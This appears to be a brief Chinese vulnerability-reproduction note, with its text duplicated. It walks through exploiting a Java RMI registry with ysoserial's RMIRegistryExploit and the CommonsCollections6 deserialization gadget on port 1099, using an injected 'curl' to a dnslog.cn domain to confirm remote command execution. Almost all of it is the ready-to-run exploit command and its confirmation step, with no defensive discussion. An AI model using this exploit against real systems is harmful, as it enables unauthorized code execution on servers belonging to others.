漏洞复现
先去这http://www.dnslog.cn/搞个dns
然后用这个命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
然后刷新dnslog
就可以看到命令已经执行了
先去这http://www.dnslog.cn/搞个dns
然后用这个命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
然后刷新dnslog
就可以看到命令已经执行了